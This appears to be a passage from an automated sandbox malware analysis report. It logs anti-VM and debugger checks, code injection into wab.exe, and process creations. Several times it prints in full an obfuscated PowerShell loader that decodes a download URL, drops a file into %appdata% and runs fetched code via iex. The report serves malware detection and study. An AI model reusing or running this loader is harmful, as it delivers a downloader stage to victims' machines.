            Source: wscript.exe, 00000001.00000002.1276421727.0000021453814000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}RAGE#V
            Source: wab.exe, 00000012.00000003.2163783606.000000000668D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000668D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_021C70B8 CheckRemoteDebuggerPresent,18_2_021C70B8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0750E145 LdrInitializeThunk,13_2_0750E145
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 22_2_005F2A7E GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_005F2A7E
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 22_2_005F3450 SetUnhandledExceptionFilter,22_2_005F3450
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 22_2_005F32C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_005F32C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3660000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 21CFEC8Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$utmmeligheds = 1;$skimme='substrin';$skimme+='g';function fritidsmuligheds($udrejseforbuddene){$valetism=$udrejseforbuddene.length-$utmmeligheds;for($syring=5; $syring -lt $valetism; $syring+=(6)){$fundamentalismen+=$udrejseforbuddene.$skimme.invoke($syring, $utmmeligheds);}$fundamentalismen;}function exuberate($lavrss){&($arbejdsvrelser) ($lavrss);}$flokkede=fritidsmuligheds ' feltm dumpoholdfztorreiddsfjl ihukl.ennaa trol/hydro5 byst.mosdy0,yrin hoved(krydswmoderinat.inhvntrdfagopohapt windves si.e sprinnbakketafsyn smukk1spids0 flue. garg0coper;le.te kahiwbr.ndiiodo.nyndet6 uls4nonco;heire s.inkxsynsh6 bier4lgeu ; kara bojsdraktievp.ege:krige1tan.p2ha.de1overm.enhus0propi) tage nargigstilheeg,trcdclasken,ososvnig/tykm.2svang0oks,p1parac0para.0g.lva1 bull0jasmi1over. dikerf badeiconcer bra,eunderfdepaiobyggextange/ unis1pharm2 atr.1 tj n. hens0homop ';$medicopsychological=fritidsmuligheds ' befluagi,ns lac eove,frpolya-apoteawardegtre cesa,kenpo.tot,wist ';$infection=fritidsmuligheds ',ingmhmodhat afmgtdissop cilis au,o:flamb/ seku/ ,elnd extrruds,yiparagv pseue fati.drowngevighobr.ttoorg,ngkrakelmikroeundep.fo micaffalopanermwe eg/van butiresc usrp?decolep.enyx an.lpproduofootlrspooftbaand= slutdch.huofo,skwbeic,n forhlpictoo.uropalagridopsam&vindeicommedmissi=upbla1john,hcoldnpravnembetjer ber wkn.glx nstedtrforwtrninncarioi trbe6sportxcount5 vvefgerhveyskuess sweemcolpeih,len9kandivsign.6tarmreskimokco,cijtvangz begii entrt met,1buglega gel-retretprog.t erve ';$noncombustible173=fritidsmuligheds 'botet>trskn ';$arbejdsvrelser=fritidsmuligheds 'selviisuperein skxbredb ';$museumsgenstande='haplessnesses';exuberate (fritidsmuligheds 'rustfsr ppeeunquotpa,as-lnforcreubeosmovsntransttweene costnbesantscler ejnar-electpunaddalobeltflusthafhng ilittneigh:unlar\ gul s,oninobeha,maheyrbtriale .remrpestii footsreno.hgylte. nutlt v.luxda.nitcigar mi.k- rt svlindaasta.nlcavalu iliaefun,t godmo$ ultrmhim eu.affesklarledelf uekspamsalams lommgbenchehnsesn resisl,mbetclevea patensteridpistoescrei;su,fe ');exuberate (fritidsmuligheds ' a,niidendrffortr i.raf(elefatunspieski.dstermittid,e-li iepsmiggatal ht overh gulv u,tet rors:t.aum\scarlsflyttotilhymcame,bunc,aehaandrsyri.iter is uhaahbiory.retint lumixprobit rrlg) expi{concleredbuxf.deri galmtc.ort} ledd;.ksam ');$chaussebrolgningens = fritidsmuligheds 'chan.erenticwh.elhmyarioo ist fibr%lgnera edlgpgrsropmyrekdkapitalivsvtgrapla,utde%capen\quinocsadacostrmhl bahue snniosummapans,atbengnietchilinc.nuo.erammoudi.sordiuslagtnvkstrwstran despo& hjl&heter peakemetamcharmohstumpoghost .eapf$sepul ';exuberate (fritidsmuligheds ' itch$ afrigneotel fejloku,esbsen,eaunspilsams,:oprres siveufandaprecogppregelpistei sk,nc sionaverdethalvfeun.il= m dn(inddacmytilm skoldstilg m nha/fortrcanted u.gdo$trretcsprouhskilbalamm,u a emse entsskaaremudpubtmre,rvelloounderl beebgsp,eanordknibuld nxan
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$utmmeligheds = 1;$skimme='substrin';$skimme+='g';function fritidsmuligheds($udrejseforbuddene){$valetism=$udrejseforbuddene.length-$utmmeligheds;for($syring=5; $syring -lt $valetism; $syring+=(6)){$fundamentalismen+=$udrejseforbuddene.$skimme.invoke($syring, $utmmeligheds);}$fundamentalismen;}function exuberate($lavrss){&($arbejdsvrelser) ($lavrss);}$flokkede=fritidsmuligheds ' feltm dumpoholdfztorreiddsfjl ihukl.ennaa trol/hydro5 byst.mosdy0,yrin hoved(krydswmoderinat.inhvntrdfagopohapt windves si.e sprinnbakketafsyn smukk1spids0 flue. garg0coper;le.te kahiwbr.ndiiodo.nyndet6 uls4nonco;heire s.inkxsynsh6 bier4lgeu ; kara bojsdraktievp.ege:krige1tan.p2ha.de1overm.enhus0propi) tage nargigstilheeg,trcdclasken,ososvnig/tykm.2svang0oks,p1parac0para.0g.lva1 bull0jasmi1over. dikerf badeiconcer bra,eunderfdepaiobyggextange/ unis1pharm2 atr.1 tj n. hens0homop ';$medicopsychological=fritidsmuligheds ' befluagi,ns lac eove,frpolya-apoteawardegtre cesa,kenpo.tot,wist ';$infection=fritidsmuligheds ',ingmhmodhat afmgtdissop cilis au,o:flamb/ seku/ ,elnd extrruds,yiparagv pseue fati.drowngevighobr.ttoorg,ngkrakelmikroeundep.fo micaffalopanermwe eg/van butiresc usrp?decolep.enyx an.lpproduofootlrspooftbaand= slutdch.huofo,skwbeic,n forhlpictoo.uropalagridopsam&vindeicommedmissi=upbla1john,hcoldnpravnembetjer ber wkn.glx nstedtrforwtrninncarioi trbe6sportxcount5 vvefgerhveyskuess sweemcolpeih,len9kandivsign.6tarmreskimokco,cijtvangz begii entrt met,1buglega gel-retretprog.t erve ';$noncombustible173=fritidsmuligheds 'botet>trskn ';$arbejdsvrelser=fritidsmuligheds 'selviisuperein skxbredb ';$museumsgenstande='haplessnesses';exuberate (fritidsmuligheds 'rustfsr ppeeunquotpa,as-lnforcreubeosmovsntransttweene costnbesantscler ejnar-electpunaddalobeltflusthafhng ilittneigh:unlar\ gul s,oninobeha,maheyrbtriale .remrpestii footsreno.hgylte. nutlt v.luxda.nitcigar mi.k- rt svlindaasta.nlcavalu iliaefun,t godmo$ ultrmhim eu.affesklarledelf uekspamsalams lommgbenchehnsesn resisl,mbetclevea patensteridpistoescrei;su,fe ');exuberate (fritidsmuligheds ' a,niidendrffortr i.raf(elefatunspieski.dstermittid,e-li iepsmiggatal ht overh gulv u,tet rors:t.aum\scarlsflyttotilhymcame,bunc,aehaandrsyri.iter is uhaahbiory.retint lumixprobit rrlg) expi{concleredbuxf.deri galmtc.ort} ledd;.ksam ');$chaussebrolgningens = fritidsmuligheds 'chan.erenticwh.elhmyarioo ist fibr%lgnera edlgpgrsropmyrekdkapitalivsvtgrapla,utde%capen\quinocsadacostrmhl bahue snniosummapans,atbengnietchilinc.nuo.erammoudi.sordiuslagtnvkstrwstran despo& hjl&heter peakemetamcharmohstumpoghost .eapf$sepul ';exuberate (fritidsmuligheds ' itch$ afrigneotel fejloku,esbsen,eaunspilsams,:oprres siveufandaprecogppregelpistei sk,nc sionaverdethalvfeun.il= m dn(inddacmytilm skoldstilg m nha/fortrcanted u.gdo$trretcsprouhskilbalamm,u a emse entsskaaremudpubtmre,rvelloounderl beebgsp,eanordknibuld nxan
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$utmmeligheds = 1;$skimme='substrin';$skimme+='g';function fritidsmuligheds($udrejseforbuddene){$valetism=$udrejseforbuddene.length-$utmmeligheds;for($syring=5; $syring -lt $valetism; $syring+=(6)){$fundamentalismen+=$udrejseforbuddene.$skimme.invoke($syring, $utmmeligheds);}$fundamentalismen;}function exuberate($lavrss){&($arbejdsvrelser) ($lavrss);}$flokkede=fritidsmuligheds ' feltm dumpoholdfztorreiddsfjl ihukl.ennaa trol/hydro5 byst.mosdy0,yrin hoved(krydswmoderinat.inhvntrdfagopohapt windves si.e sprinnbakketafsyn smukk1spids0 flue. garg0coper;le.te kahiwbr.ndiiodo.nyndet6 uls4nonco;heire s.inkxsynsh6 bier4lgeu ; kara bojsdraktievp.ege:krige1tan.p2ha.de1overm.enhus0propi) tage nargigstilheeg,trcdclasken,ososvnig/tykm.2svang0oks,p1parac0para.0g.lva1 bull0jasmi1over. dikerf badeiconcer bra,eunderfdepaiobyggextange/ unis1pharm2 atr.1 tj n. hens0homop ';$medicopsychological=fritidsmuligheds ' befluagi,ns lac eove,frpolya-apoteawardegtre cesa,kenpo.tot,wist ';$infection=fritidsmuligheds ',ingmhmodhat afmgtdissop cilis au,o:flamb/ seku/ ,elnd extrruds,yiparagv pseue fati.drowngevighobr.ttoorg,ngkrakelmikroeundep.fo micaffalopanermwe eg/van butiresc usrp?decolep.enyx an.lpproduofootlrspooftbaand= slutdch.huofo,skwbeic,n forhlpictoo.uropalagridopsam&vindeicommedmissi=upbla1john,hcoldnpravnembetjer ber wkn.glx nstedtrforwtrninncarioi trbe6sportxcount5 vvefgerhveyskuess sweemcolpeih,len9kandivsign.6tarmreskimokco,cijtvangz begii entrt met,1buglega gel-retretprog.t erve ';$noncombustible173=fritidsmuligheds 'botet>trskn ';$arbejdsvrelser=fritidsmuligheds 'selviisuperein skxbredb ';$museumsgenstande='haplessnesses';exuberate (fritidsmuligheds 'rustfsr ppeeunquotpa,as-lnforcreubeosmovsntransttweene costnbesantscler ejnar-electpunaddalobeltflusthafhng ilittneigh:unlar\ gul s,oninobeha,maheyrbtriale .remrpestii footsreno.hgylte. nutlt v.luxda.nitcigar mi.k- rt svlindaasta.nlcavalu iliaefun,t godmo$ ultrmhim eu.affesklarledelf uekspamsalams lommgbenchehnsesn resisl,mbetclevea patensteridpistoescrei;su,fe ');exuberate (fritidsmuligheds ' a,niidendrffortr i.raf(elefatunspieski.dstermittid,e-li iepsmiggatal ht overh gulv u,tet rors:t.aum\scarlsflyttotilhymcame,bunc,aehaandrsyri.iter is uhaahbiory.retint lumixprobit rrlg) expi{concleredbuxf.deri galmtc.ort} ledd;.ksam ');$chaussebrolgningens = fritidsmuligheds 'chan.erenticwh.elhmyarioo ist fibr%lgnera edlgpgrsropmyrekdkapitalivsvtgrapla,utde%capen\quinocsadacostrmhl bahue snniosummapans,atbengnietchilinc.nuo.erammoudi.sordiuslagtnvkstrwstran despo& hjl&heter peakemetamcharmohstumpoghost .eapf$sepul ';exuberate (fritidsmuligheds ' itch$ afrigneotel fejloku,esbsen,eaunspilsams,:oprres siveufandaprecogppregelpistei sk,nc sionaverdethalvfeun.il= m dn(inddacmytilm skoldstilg m nha/fortrcanted u.gdo$trretcsprouhskilbalamm,u a emse entsskaaremudpubtmre,rvelloounderl beebgsp,eanordknibuld nxanJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$utmmeligheds = 1;$skimme='substrin';$skimme+='g';function fritidsmuligheds($udrejseforbuddene){$valetism=$udrejseforbuddene.length-$utmmeligheds;for($syring=5; $syring -lt $valetism; $syring+=(6)){$fundamentalismen+=$udrejseforbuddene.$skimme.invoke($syring, $utmmeligheds);}$fundamentalismen;}function exuberate($lavrss){&($arbejdsvrelser) ($lavrss);}$flokkede=fritidsmuligheds ' feltm dumpoholdfztorreiddsfjl ihukl.ennaa trol/hydro5 byst.mosdy0,yrin hoved(krydswmoderinat.inhvntrdfagopohapt windves si.e sprinnbakketafsyn smukk1spids0 flue. garg0coper;le.te kahiwbr.ndiiodo.nyndet6 uls4nonco;heire s.inkxsynsh6 bier4lgeu ; kara bojsdraktievp.ege:krige1tan.p2ha.de1overm.enhus0propi) tage nargigstilheeg,trcdclasken,ososvnig/tykm.2svang0oks,p1parac0para.0g.lva1 bull0jasmi1over. dikerf badeiconcer bra,eunderfdepaiobyggextange/ unis1pharm2 atr.1 tj n. hens0homop ';$medicopsychological=fritidsmuligheds ' befluagi,ns lac eove,frpolya-apoteawardegtre cesa,kenpo.tot,wist ';$infection=fritidsmuligheds ',ingmhmodhat afmgtdissop cilis au,o:flamb/ seku/ ,elnd extrruds,yiparagv pseue fati.drowngevighobr.ttoorg,ngkrakelmikroeundep.fo micaffalopanermwe eg/van butiresc usrp?decolep.enyx an.lpproduofootlrspooftbaand= slutdch.huofo,skwbeic,n forhlpictoo.uropalagridopsam&vindeicommedmissi=upbla1john,hcoldnpravnembetjer ber wkn.glx nstedtrforwtrninncarioi trbe6sportxcount5 vvefgerhveyskuess sweemcolpeih,len9kandivsign.6tarmreskimokco,cijtvangz begii entrt met,1buglega gel-retretprog.t erve ';$noncombustible173=fritidsmuligheds 'botet>trskn ';$arbejdsvrelser=fritidsmuligheds 'selviisuperein skxbredb ';$museumsgenstande='haplessnesses';exuberate (fritidsmuligheds 'rustfsr ppeeunquotpa,as-lnforcreubeosmovsntransttweene costnbesantscler ejnar-electpunaddalobeltflusthafhng ilittneigh:unlar\ gul s,oninobeha,maheyrbtriale .remrpestii footsreno.hgylte. nutlt v.luxda.nitcigar mi.k- rt svlindaasta.nlcavalu iliaefun,t godmo$ ultrmhim eu.affesklarledelf uekspamsalams lommgbenchehnsesn resisl,mbetclevea patensteridpistoescrei;su,fe ');exuberate (fritidsmuligheds ' a,niidendrffortr i.raf(elefatunspieski.dstermittid,e-li iepsmiggatal ht overh gulv u,tet rors:t.aum\scarlsflyttotilhymcame,bunc,aehaandrsyri.iter is uhaahbiory.retint lumixprobit rrlg) expi{concleredbuxf.deri galmtc.ort} ledd;.ksam ');$chaussebrolgningens = fritidsmuligheds 'chan.erenticwh.elhmyarioo ist fibr%lgnera edlgpgrsropmyrekdkapitalivsvtgrapla,utde%capen\quinocsadacostrmhl bahue snniosummapans,atbengnietchilinc.nuo.erammoudi.sordiuslagtnvkstrwstran despo& hjl&heter peakemetamcharmohstumpoghost .eapf$sepul ';exuberate (fritidsmuligheds ' itch$ afrigneotel fejloku,esbsen,eaunspilsams,:oprres siveufandaprecogppregelpistei sk,nc sionaverdethalvfeun.il= m dn(inddacmytilm skoldstilg m nha/fortrcanted u.gdo$trretcsprouhskilbalamm,u a emse entsskaaremudpubtmre,rvelloounderl beebgsp,eanordknibuld nxanJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
